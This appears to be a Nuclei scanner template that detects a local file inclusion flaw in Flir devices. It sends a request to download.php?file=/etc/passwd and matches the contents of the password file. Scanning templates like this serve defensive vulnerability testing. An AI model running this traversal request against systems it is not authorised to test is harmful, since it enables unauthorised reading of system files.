id: flir-path-traversal

info:
  name: Flir - Local File Inclusion
  author: pikpikcu
  severity: high
  description: Flir is vulnerable to local file inclusion.
  reference:
    - https://juejin.cn/post/6961370156484263972
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: flir,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/download.php?file=/etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/27
